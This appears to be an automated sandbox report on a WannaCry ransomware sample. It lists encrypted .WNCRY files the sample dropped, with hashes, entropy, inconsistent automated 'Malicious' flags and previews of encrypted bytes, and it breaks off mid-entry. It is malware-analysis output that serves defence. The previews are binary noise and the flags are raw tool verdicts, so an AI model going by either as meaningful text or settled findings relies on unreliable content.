                                                  Preview:WANACRY!.....}C}a.\. .K].....^7/.y..k.;K.0j......9y.K6...jD...Y2....^>.b..e.=.Y.1/&..91..~|."....3...... 0..6z.K....+....~.@.al....a|j...J+......}.b|E?...n..1.<.y.....K......e..S.`.4......../...k....Z....P.{..kVqB.`....e.:.X..1..Z.}@o..p*l.1.").......R.......X........>.E}X&:.aG..'....w...$..>......@..x%..g.U......S....|v..qL..q...v$...../.....B.Vk......h....R.!x.BB..D..|.].N...LVJ....};.Qr#...Aukp.B.:N.BM....bzZ..>O..x.9.....)......L..Km.l..P....\.n...Z.Q....C.M..J'& ..0.....l...M...Zd?[.!....`Xf..2z.agZi..A|.....~2..n.Vy.7..c.h...0.ch8t.f./....:D....b.%..x.C...B.L#8.H.>.<#..a.j,kb...D...#.....87.WC.~Q.D....}.7..sr...x.....c.(..E.].......6......[1...f.H..p .)....Q.'..J..=r<g}...}>.U9k....G.......AFvn.i..."7o.)._j......ZX.ok.T+...`_.....z.....&F.7.i....y.V..qnj..L......G/...1.n'...F.#if..].].....v..c....U.(.s.DZ.@E..BE.X......}%...7j'E.Y.-.PH.D...x.!.[e....\Z.b.R..U.o.......'.p...u.........5.......KNc....77.B...q<....!..:-a...p.......>.A

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Notifications\wpnidm\70af9816.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):9736
                                                  Entropy (8bit):7.975696490298713
                                                  Encrypted:false
                                                  SSDEEP:192:z+BNTrOq6Igzy0EJJqSxCOj9mdlz+g3joJEGJOj/mpLspiKQtlgfMg:CHTqEJdCOj9mtSW/mZs0KEqF
                                                  MD5:9590BEA7AFB5D6F2F84EB52C8CF59172
                                                  SHA1:AB20957A1FEE44E3F88336A6288D0FEAFDF78A79
                                                  SHA-256:B51FA46879721C7238DFCBDD2522780367C330875C8FB1CF00151D1C792D115C
                                                  SHA-512:866DF352D46F9FAD398A6883F3C8BE18375ECE3BEC8FB29E9E93F782D36928211D690F55FFFEA67D20786A10AD4B2579BD3CBE2064CBC142949E8F0427AC32FE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....r....3.=N<./..1.F9.Z.F2.../...i......2.:C..Y...j..d....a.rX.....".....~<r.+....k..M.j.t.L.f.#\......s...z7..........p!.l..o.Qv......C.ik$.."._..:wz.M.q......z.q..).v..f.....{$..X....)5..&.O..z.xy.._....q5..6.O=..k...;.={..d..y...D..'.@...m.QC..1.S>2V7S.....$......N....d..bY..b1&....$%..Y;.dl.E.......3r.I[.L....GK..b.%......=..\.tI.=......I...K..........u:....l...lk;E.W....J0.`.!...@...j...5@.u..wA....c..... -.G...^..4...lW...@ ...'.....g..J.....\........Y<...../@....N}.,..o.k.;..Z.....X.@Z.h.....Kj?[..[...N...^.rg.&z.G..B.'.Zsk....?.....w......mb..6<.]....Z.AI...;{q..C..I.GH....a.#~#......S9H8N.9t.O....<...5<...N.Zo..........fK..u.a.e...k..vT.zB.......%....g...|.;..}...oc5..E.QQ........U..3...u....GG@..m..X..Q.....x.5.=.p.jN...O..&a.u.g5$...F.K...|.z{.0._..5N........cU......Y...8k...M..D..(.'.[X..H.4rF.d....U.F............ .!do.+..o...e.!L]D/f.O..Fe.....&.d.2K.]....K.....T....g.e.`l<.Lc`.h.....L9K......}.,.N.Y%.Zs&.....O..f..6R......C".&.

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Notifications\wpnidm\8fce0f3.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4552
                                                  Entropy (8bit):7.954529835159166
                                                  Encrypted:false
                                                  SSDEEP:96:o2zb3zgrBG8Pcw5ZPOymIpoFo68l9y02j1cnYIgAtp/4mfP8J:3DgwEzPOT268f258DgAtp/40PU
                                                  MD5:FE562D00DBDCC07521317B634727524C
                                                  SHA1:EC558031F991A30F4E8BF407DB46A2CD10DCE2C6
                                                  SHA-256:3F88E34C2B4F6749EA6A3E6D6F9D0D91651D04E2A9445194EFBD19A9870C9591
                                                  SHA-512:A590E688C4E9A77F63458617759393D18007955747EEDE2C3294A4B62C5658102B6EC866B854FD3C69E9346453068E1BFAC989130ACBD02FB0EEB2B8CAADD7C9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!........BGE...F..0d..A6z.!....r....._.p..m.z.?.;.G.!8f..o....`.~.e.U..X..L:.......t"UI./_.?-.p......u.....yH.(.6...a...^..`p.4..>8`...B.`6p.......o].K..E.&3..'....2`.D..^........Gu=.iq[...,....L..a."X.1.J#t....b......d...Og..P^.(j...p..................u.r.&............^q.....!jD.L=.. @].~..A.....P....F.w.!..@k.).t.Xi..."..s.2.fg...i2^......>.....D..N..h.BS...G..h .w.=z...7.......iLH-..{.z~.8..".|Od..IM........z..hzq_9.[Qz4."...z._I.U}\R/..U..C.d.d...|shk..T*|Je...&Ej..{tKlq).....71i...F....O0.<.zY..(..6'....~..*DX.K1.uP..t.b.f/.cN... ..z..Qa.. .[.@...|.,(.v..E.z.S.....v[)q.....oE+..A.F...;^.xS.H|.9(L|\X9...kU..J3~.b.=.....f.)[...~1|v..;..WW.....&...x.....z..C,..O..?..P[.....{(!.7..-..tj. .;;...@.....tC...r....f.............*.....U....&..(..|....'.&...9.2...S.-.m.1.....1o..&........l}....H.S..!....(s.m....p..^.c.-E.(.R.....-.FDk....H.... izE6.....`..Y.g.Z.?C...V'.....>....mu...!.%...".E...1U0a+.ux3yv.../.s@.....).

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):277304
                                                  Entropy (8bit):7.999290034469061
                                                  Encrypted:true
                                                  SSDEEP:6144:qz3fqepKhhVKR2mRFzCX/YRPGFWgfI6cMom3AQ:qz3fqeshhER2mzXxgfmm3AQ
                                                  MD5:A6E6D9A17297C4411585E766BA818F1B
                                                  SHA1:5E687B2167BE9D775310D394FA2AB3A6EF8449E8
                                                  SHA-256:318317CC17E423E1C249FE01F28EBDD2641B8F0E9E9E7A84A99DD343873FD56D
                                                  SHA-512:3C85C72F2809053D6B51526CFFD12ED87E455029EB5EFC95AE2514BF37277272E89134898D8142BB4FBC86A1CC90778C23B07F6DF816B7C39F849AC10E9792B4
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!........7.2........&.,|/...O..=.........n]..F......Wk.B..Jm.!].....Ioh&.rep...pS..E..... ......o..Z......|.B+..!+.. .....).....w..u.]&.d.C.ER...6..I..v..P..4..'..x.W~R...SWQn$EZ./..j..._A..?.Yv..R.<.....>A.A.@)...]..X.v8F]?(*P...o.>..,j..l...%>....$.....:......):.....X...........M."-..7R..E.gD..R..o8@...'.8..G.Z..bi.......=}..a .V'..~jlL.P..A...:.......y8s;..X..*|"GK..~...z.M..;..*z(.:......B%g9+f.(k!1.}...'H4i.z U...]X".os.A*r.CK.D.....Jl.....U.....+..!.._.J.5{../J..?.y.p.>.<..^.n-E.9....W..,b1<.M..mm-.`...b.......;._u!.m]..B...A.?.W....,...P....~#...cf..2.`.@`.....m..SL..J...bV..2.4i`.5AU......Y..xw.....[..o..b.T.*>..7.2.xT..J{.@..K.:..IH..{.A.....6....H...q.:..e._'W.@B........m...".I^..[...X.3.6...%K..2..mq.d../..Ge.`o..Sl..=.\.>)..L2..I......\Y.>..x.1.Y9F..J=.fk...v.L...M,x......H..t........;h".aG...+.......z..$>.+.n...>.q....@.{.c.AV..B.{{q..D}.,.s.`w.@.9./>.-..)......5.........5...p...R...v.&v...I......eo..Dq.z.%

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\female_names.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):27000
                                                  Entropy (8bit):7.993109225418807
                                                  Encrypted:true
                                                  SSDEEP:768:qO9/vxTYkamH8Rw6va2NwUla+aFuZHECnMO5PRzHD1:qOzTEFv3PLHTnMcPRLD1
                                                  MD5:0CFF5466F813801FE669108FC88EFA6B
                                                  SHA1:DCDC816AB4BC7D5A543667B56B723461552BF557
                                                  SHA-256:A48413FE07FA9F6F5009446FE9556B2FEEC7C4084E16ADDF8895E43E824A53AB
                                                  SHA-512:44124DEEA29D6AFCB8B0A10D22C82A506EA6B6BC901643F7EB3FA208F97290881888452E27B0C3605CCD4B793C55BA69FE0F3A87296939A96D825B40CB78118D
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....b%68.w..2.e.Mcb.F.Yw.hH..wkZ...g.~.Zcy...j.....[=..T.?9I...c.Q...e.....[..$P^.H..S.. .<...rx...!.[......MS,y9q$.%.....u..^.8>..O.K.-.`..E`..#d\a~.......o..H.2._XlY...*..^/OO&..ogT.B6....K...DE.Z2|...-.....M..P..9U....|.{P1.0.....i:..>..z...A..e.....Th.......z......S.T...|2...:......Z.).oeL.Q&.1...N.......D.7.t.6.;.........D}..B...aC_A.0...`.5.....A1..:...}4".b..%)...LQ.eTB."...3y..:.....O.NWoHf.%3?....g.5..+ .N....f^..s..J.o.......a..fbn.kJR]0..l......~K....I".....Q.u.".Oej".:....!....j.W.9."....J.D"H?......it.Ur......I.$L.~......z.O~svE..6..#.H'-5...k+v.... x.?u..._....m.8.0.. ..".P.......WK..}1T%_...Jv.h..........z........O..<;X.l..vA..\........Du-Q.j....z1I....h`.U.s...,"...7.....`\...Q..j.o.l.?.Z%.{.u..\,M.>.........3 ,8.A.......{...X...e.o.{.N.....M0...<.<.?..@..i..d.=.T.@?.G...E........M..0.......y..H.M..#.Z..x.O.\W.=..........zv.Y\....pO!A...xvy.W.qi......Ud.&K:.>x.i...-.hv.y..k..I....w..g...sB.6.........D.S.b.6.H...+.

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\us_tv_and_film.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):164584
                                                  Entropy (8bit):7.998869873581819
                                                  Encrypted:true
                                                  SSDEEP:3072:ftz8wvDzxxhwYrMVN7kx0CCpwY7zC6BTgc+4enneMhegPL2YV12K:WGDzxvXrYixmpwATg4yvhJT2YV12K
                                                  MD5:304FE6BFADB9A351FF1102B5FA0EC1E4
                                                  SHA1:7F42E1495C522BE9DFDC3B2340DBAF51F3818F04
                                                  SHA-256:4D496F0A0489557C0B9089E890BAE80E26AC460A9571D2C780F02E0BC271CF21
                                                  SHA-512:1E4DBF633371FB5693BBA4ED50BDF3ECAAB4C775CE28EA86374616DE9FED043B6BFE1EB00291F0C2A1FDF0D435312B5D8125EE9C7991CFEEC9CF560CEF2EB4F2
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......e;.M...W..i8Z.*.......Jv.......~*{6....iL...x..=.....T.GpR.......n...l?#8.T..Q...U..$=.|..&.2.i.a..w...B..P....."..".;..y.g......tj...2/.^..*..L.E.sVbK.n.y..%...n......m...`..s.._-.r...J.,.V$.._V..).,.5.@.M...#I..)sT N.......'.|.C...z...4.............r]."\....@..R,.!US#.x.P...>....#.2H....|g.._..:.Sg.%k.........s.&..FY.k\.4.^en....}...j|2..f.k...%..~.`v..J....g?t.h...... Z................B..h...5UML...]S.......-.x.w3D.e...r5.0..* ..4...e...`m.X.&Z.% .k$.X.W..0.........A_!..h...2d.....r5v)..q%X....&...BF..qm...9..2........)....<.6..r.n.2.p..-.._{-.a.... 1.0.i..#@.F}r......b.]$.F9....d..FA...V..\0.1.6Rl$...Ox....@.. .>......MR.|KD.nf.x...&{.T6..l....`..y..........@......";....5.m..Gc..D.u.........SQC....b....K.3.X3....y_..-j ...6._...'...~M.X..Q.:.,@IY"...b.x.LI3.Mcy..]..h.f.g....VDkS..}).o........0..?..........W#.."1J....V..bG....#`..Z2{...tSr..T.'A.+...9.......<^.X..S..Dj..M..L/..gG.`....\....|.;al^.S.....Ev..)0I..c

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.29.4\LICENSE.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):24904
                                                  Entropy (8bit):7.993469822656297
                                                  Encrypted:true
                                                  SSDEEP:768:Dd7c7w8l6WGw2KjoFtVbov69BGeGjaF2I:Dd7Po2So1boi9BdiYL
                                                  MD5:89E4BF8294B2C04B94D73D82783147E8
                                                  SHA1:CA9F8F445DF01B85250071761628F0D80C0DD437
                                                  SHA-256:6BEFE0B9479BB464650226DD30EADFDF4806AE88E224F418D971DBF2CD7A68AD
                                                  SHA-512:3438DB876FF6C2E6F682235EC4F7C8DDF045219CA2CF9C92B3CFD65DB01921D6C14E21C98E1C38FEF3E12FB8479558773220153DAF6EC86CEF7FB83F215BE815
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......q..dK8F..7./..]...G....&.g....X.........v4._.%..5..g"`.....5.H6~&...I..v.....J...H.T.D.q.+d......j\....%....e.....N..t@.g..l*....[. ....+.N>7.z.....>.7.8......}..5...TX.E...#...2k8j...q.).j.Z.../q.........7Q."n.}.&.:~K9...)b.1.*N......F..../`.......%....&w..UD......4..V.. ......?....e..@.|._=[....=.x...S0....F.>.b.!;.....MuuM....;[.q."..|..........N!E.W...-...O4...)yBy;..<6?.tw.,&..bH..8L%..t.a..c.5.C.U6..^.."...i~-.`z".,.@k..+.h...w.'..t.}Ed....x6f..L...j:.>V.Ln...X.W...9./nq..Z...<.;{.GX.?L.{..V....>....w..K[.... ....^[.o.^.....u5......D...>...l.&. .B...1.k...7T.d~b.DY...G.S.V../......vCB...{.2A....}.c..EO..#.*..{i.#7r.....c,>....$^...6.Gt...d3+..8.,.......t}....l.kBu....`.t/.&..bD....*..M/...bW.E:k..R.....S.S.....A.D\....2m.....L..m.5..$..I~n-t....Q..6*...+DP5./V.....G("..$....<*H../.7.e..0..]@.Kpt..IR.f.9.....|./.$P.}.X'$.{-rB4.#.-...-+............._~.W8.......?vWg.M..QBX.P.5.n...F.$(.1.]P.....E&....+{).y..

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):690472
                                                  Entropy (8bit):7.999708855093496
                                                  Encrypted:true
                                                  SSDEEP:12288:xKIdDmmA7Xc23KltAZ66ggEkDrRgUp4QnQy2509cBYnyQiJlXv:xKItmqlqf9DFgn09SYyvJZv
                                                  MD5:26252CA5C0E8985BFFCD718988E40BEC
                                                  SHA1:0EEDEFC9EC1B5026B88C80AC854B2A4BF7819911
                                                  SHA-256:D2CBDC183BD6F7826FB5A13C52B425E3F0AFF9AE9492E6EB66000F87ACAC06F2
                                                  SHA-512:529B1A92271C4D4DFFF03E1412E6499E1F190D4848F009341215D79F294144289A7E344AF7CA0F92EC7F0E761E0F782DC90C9223FE61DB3F3F7D85427F627A96
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......i.~!.=lY..&...mrH....x!.c.........._iT..C.<\|....^C..v|..<.......{.p....[.o.....f...q.z.KP..g[mu.K...O./........L..u..P...P.[.Yt.*5...3a....`.....V.P,.6e.e`..].VM.....>..[.(.P">l,..)?OQ.?Wd..B.f8:r..-{..o.vi..$d*z....jVo.....EMK?...5*..D..yR.=;...............J.....B.Z.m...oL...#k.A.h.v..K...M.^.X.Z....h..k\S...~.S.i7....?.I..2.1.}.~.......-W..@L.h...e...N..[.b...=.q$.....Q...`... ..S..:.7..J.....9Z.#r?...Nk......XI3.sh...H.tYx1x.1>...........&_*..p....M.].r..>m]C....pM...b.F..ej.S~7...`.Hr..8...&....P.uI....p.?c..B.....I..y.."......Y.C....<..../.....yv(.L.#t..J..8..X..O%T7..a&.0...w_.......s...... ..h..]....1.....R.[..............$v_..7q3....6EX.J../.u)Zs>i.k?..%..A.h.G.....Rj.....V....jO....O..1....V.K$.D.&.).$.Y.u....`c..=O7..zUkuT]-...g.....~...~...#..Z..5.....R;M'......-..1k.BK..q.#wY6E,O.....'Q$|....:Se..#.(.0..=..p.i....3.j........=.V...F.(,l.......~....:d.u0:.?!gU.>0|....O......)?...oC...i&:..ZI..Tk...j..H..!..>..T@A.|7

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\Flighting\FlightingLogging.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1816
                                                  Entropy (8bit):7.877670034236576
                                                  Encrypted:false
                                                  SSDEEP:48:bkSbFEVV24XZgd/r9MkliTsDEXAuANSPEoSyCxvNExvSHGI:oUOnXqj9MkliTq7SPET3HExvSHz
                                                  MD5:CF2B9581C8B2D6D0FAC71AD2D0273B94
                                                  SHA1:425DFE9798E84082EC33A78230D50AC05015C005
                                                  SHA-256:082C7578A170B9AB67CE4122AA766A84731AD19F74E76256CFD7C98E48AEC163
                                                  SHA-512:1B63B6441B029BEE5F12841EA316642A03F284D13964CF61C75F7F2C76EC0B8C2506F896651F0D00DCCD477FF5357685AB779046CB43924239A73BA9451EFA2B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......(.~...;..L.^...g.@[-LiZ.6.....U&!;K.7..\U......U.&..f+....y_R..+.....s..*.~!.G.%....Xv..t..,.....R.|X.E.T.NS.....y.v..5*.#.....?q.%5D.m..\...F\V....z@..{...|..{..]....G...q....C..z_.W.#Qo^GER.|0fV*.A_...z..!.UK.r..W.I.j.v..).p..v...k...d1E..c..............RF....d......E..R~...+....O2K..8M........^......F...C...]V9..t...n....-..-]X....k...^....!.x.J.....5.c..0....zOcQ.......C......9_...j_...#.lU.....+.6.s......Rhk>7J.....#....n9...a.v.rfh....{ ..R..A....T+m......M{N.r.g.7.*v.@......_.D.#.k.5..b.......]......J.KJ....t>&"O-.>"...,V.y..^`,\.%......rF..Ga..E..^@..8.AWMq.k.p.R.m..._...M\....(..;J{.l..Z.+Z.w..*..fwT..F.~J......f.V...'...agO......=...9.kv..2.OW.W.SL.........ppVb..C....K..}..G@..U.^.9T...e.-.....#t..y0..~.QK>.t..7..a1k.eZ.%.".9.4"EE....-\...!P...4=.-a......y...Q0 ]....>...~q..bX.jH2...1_b..E]..y.2..~c.9s(%..W."GVY.?....k... R.W.YSm.x...ZE..".v.X.....9...^S8...tF.....v..u...#^.L.F..Ll..o..p...CI.|..t.U).ql.z.f...7q.:.,...

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994707584058.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):115848
                                                  Entropy (8bit):7.998377237649061
                                                  Encrypted:true
                                                  SSDEEP:3072:/LxCI8stKMTkZukqheYKd5siQf1lu4b734:DII8OKikZchexONv34
                                                  MD5:F75786242A504A40893E782E6643B1F7
                                                  SHA1:F74E6AF967D91498F384776374A151DC8A2D03BE
                                                  SHA-256:534E3B91E2C7DA290B00C5A22ACAE707C4672940A1248F4DF9101FD3512022AC
                                                  SHA-512:051E7BE4F3235B71E710B402C3771E4A0489262EB3BE39FB6F5D749E7015B621EB51B313B146DBE108CE584BF93E9D05889FC10291D2BE7731DC274150C87682
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....vAI!.OE.}4R......$..buf...ju.\.?s..2..*...l.jtJRJ.VRS...z.m........M..NC.....u.t.u.lP3...qvBg..\.......s.G?3E}(....<..,}w....m...hG.A.u......G......A..G..G..R...L%`.9.......\....c_."?........E.3.q..A.j.q./Q....:.O.... +........S0...!pJ.U...x W....j.........1..>....*eQa)G7*L.w...'..l..8.-.*.d..e..G.t.4DK9..B.t......g..6L.....2.8...:.,.cr7>..{y..X2.lygJm.Tl.0.'..l..R.rM....M.=..9.t..Z`..@0H...|Whu.V.{.....|`NS.u..P}..I.93Q...9....4*....'..6%Qw..0T{.Lc.%*..*......B.d<&.3.M.....-9..<`..V"s......z/7...Y.BS8..k..E.\WwU.(d..Z.%.........x.....Bp#..W>..*.>....[.....5.....5."......8[.^..<...`1E.2hJ.mb.T.^.~.....%zT..8...T.z.#..g!7vO........'Y..I&._.....;...E%....~.F5..d.........zbh..g......].4.$...Z*..I...m..|D.k.D...D.........OK........C1ZC....t..@....#O.:f..')jW..%}".-...,.tA:2;.Ef.G.(.>.'1._}Q2..`...3..j..&....-...y..._.L...............?..g....=~...J2+p.../...........F=8....I.SLq...6..c...J,.!......&,n>.x..:.R.@..Ni6..tw;....o2M.vx...;=.

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994802498611.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):115848
                                                  Entropy (8bit):7.9984923407272985
                                                  Encrypted:true
                                                  SSDEEP:3072:auuAksAy+Jgyb1tkKZt54BcR058Uc9l/+k:duAZ+2ybDko/XU8V
                                                  MD5:F5A48721DD66A6309CABD22A481BBACD
                                                  SHA1:4F948975567E1EAADAB6089036BEAD3131A4E2D6
                                                  SHA-256:972BB75BA461D62E1CADC5BCFE4CA1AA551D75D0EA11784C3BABBAE62FBBCEB0
                                                  SHA-512:E36A847965C5BEDBCDBF9ABE93D85EB2652597F79B5F962A742BC8E5A2CCC442980FCA5FB3699BC34F323B4E3A666123FC0A0D2F6918F33ACA11F8BE1DAD0BDC
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....qm....v.C..e...v.]l..$.ooS....._..+.S..ry......c.g..p.R*m..:...(.@.1.......z.{......i.r.Tr*|fj.K..n...>7..f.,.....Z..i;.Vg...*q..W..&3.b..T<6fA.:.B..V.nZ\.A.pI...............J.....KI..m6.}`F..............fj.z. .&..2.M...p:,.+D......mn.s1.tI,....j.......v.m/ dn.\....:}D....7.L.9.0...N.Ie..n....Gp..M..Y.@T..E.....WwI/Q.=.Xp.2..^......o<..y...%..M....^.eF.`..*3Y.%*Z#.(.)4.......9K...8.X.8qZ.$_.......*.U].....t.~.[4.S.V......pQ"{I.RE}....|.A..].........-....si...V...C.P..*...=.Dx...HW;.}.w....3.|.{...H!).f..qFPK.P...Y..Crd:a...yb....$...i......65.uQ].....>...].2bD./.JY.Pm....`..:.Z..a..t..A......&..._.....<.m-~,U....E2.=..:W...h..e$.p.y.\....u..s:b..T..}..>.a?......:...j.9...V.....2.,......D:...1..#.g..;.......D>...>.M..Kb..A.N..4Z...P..nub..DZU..!.!+..3.......4..:..8.G.=..@.w`).*......E..4....g....w6.<c~......xa...I.0o!.l.o.Yv.c>.:.g.8.Hd....P..SY4.. ".7F.XO/Ov....j.k..d..'}.@..........`...7.>N..`...W...[...)...=.S.

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286129448402381.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998476469829722
                                                  Encrypted:true
                                                  SSDEEP:3072:WnfhCZPPsa8w/JeAIqATAV0NqCZb3AQqX5Qa:ofhCBsaFxeAbV0NfMQ65Qa
                                                  MD5:50AE92137338BBA0C8C01F3468D9E1FE
                                                  SHA1:09029EE3578D9317970EB9F4BAD75260CAC5ADCB
                                                  SHA-256:22B9EDC632747B3FF2B36042DB966A3D3C94000EF5BB744AE9FF0D209E6802AD
                                                  SHA-512:2E01E82D1C5709E780235F0B48A14CDEBECF54DA3FDF7E2AFE32665FDDDCECC0D270875FDDB52CA166AAA114009C1B5964F61566AB1C2363782772043B95D450
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!...........,.d3..4..#....N..,.z.!6.t. ..].....F.^R.$c..O8.(].rD...a.#H.h..."r(0......t.<..`.0..bh....Xa./..T..0.|^........px..3.".<..I..o>......L.j.e.3....0.u.C.j.9...6........'.DD.....k.|]....O.....5g..#....o......s.m~.?.tq...C.....r<*.Z..Ub...G............C....C..FBs.!_.......t.._.u!.)...y...$.uj.2...{......f7.....L.z..m~. ..w... ....?..V4..H....2._.* ......].2.l.L..+G".!.8.1a...,.)9w..w".EF{l.a..1....?5..{...oGa....=..h...J.Y.j}...%.0q..-...1...G..i....oY.z...0..H__e......eX...*.!.L.7%....WHM.e...+.(a.....2..u...Q.fwh....i|.U...pV..(..q....W.F..~d....Y..e...kP7L.}.#......0...o[.....k...C.mV..c.l....[..>x]./.....;.F...+.F=..B.u5.:.,Wo$.........V+._....[..@qwL[......l;gP.D.X........(.z..O..l..P.*.l.^..r....K30.:..O..XAP..0....y.nY4.=#...j..:....=..y....q.n.d.[~^khnt.^..c..g.w...]....ih<.{.....].<b..Pc.....6.^F..K..*..P.B .....A3.D...Bztj8 .u,.[..!.....e8.i.........z...M....g.(q..........1f..K.t..w....../..r.G.t..j... ....E.a...b}g...

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286164541279846.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998572049377344
                                                  Encrypted:true
                                                  SSDEEP:1536:COWfWK4H/+Pd5HRymYJOD9RbI4jF0Mq+OqcQDuxpyJGiV1Wl0Q97VTCI8z:CuWPddRYcjIeiL9rYGE1Wlt7CV
                                                  MD5:592D2F7DC8904EDCE4DEE2EEB6018B6D
                                                  SHA1:99D1908BF39F9508AD3F7B6C85FAB3951428CC7F
                                                  SHA-256:EEF24852772FE3DBD906272D80F4DFACFAD6B8D5DC59A41D50D0391188026FAD
                                                  SHA-512:ACE6349F81040077214ABEEE05A216B863D76B6408C4E2CFCE898F7D946404AEDCCF2A4640D751B24B81A315534F129D31574E6F89A98C66FAE32DB7BE84DA30
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....#........3.h!.g..!p.}...E.....I.....go.SZ:X ZsL....5.@4..."......^.NG[.ZP..%./....FX.:q.^>q...1E.........@._..c).~.a.).|{.<,.......X'.1K-6..O.....A.!.J0"...1H..?.q.7O.M..%/.X...D]..{...`&.......NUEW-A.......M....I.?....i.()0..N.`\.E'...u..J....M..............Cq.......-.vn....5cE.m.i...u.<.D4..C...V.#r"....%=..>..]".U...b......J...l.Dz.&.}......`..\.o..=m.x.7.>..t..Sx....z...a...E..r(..t......T..{.S"..|..].../o.%I!....yWF.w.~.7...H)..........Z$.v...W|.%q...X...Yu....S.....~1...;pNe.K.....[I..)..R......._e..x..u[*.Q....sXM.|..._{...wL.5..D...j....ZZ..f.#.Pm...P.I+...jB.j..........0.........=......7....9X...a_.....3..{X.D..."......Q....^.!...mY^X.%.u.0..h../...)0.q[57..^.w.4....`Z...l...N.t......H.........j...Q..V.......GMZ.V2&..E..z0...>Y.2(o_.1.M.hY4..u|.h.pUt^{K..XC.sdsM..)....?.[.&...=.CAb.%J..a.....y.@t..!e#..;..sF.].4.6|..\....j.$...NT...."...~..v.O.....<.9[D.......*xs.l;.9V..(..cb@..Pp...r1.y...r....&..=..Y".6.T..3-..;Gi

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220120085256.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):273704
                                                  Entropy (8bit):7.999362519832665
                                                  Encrypted:true
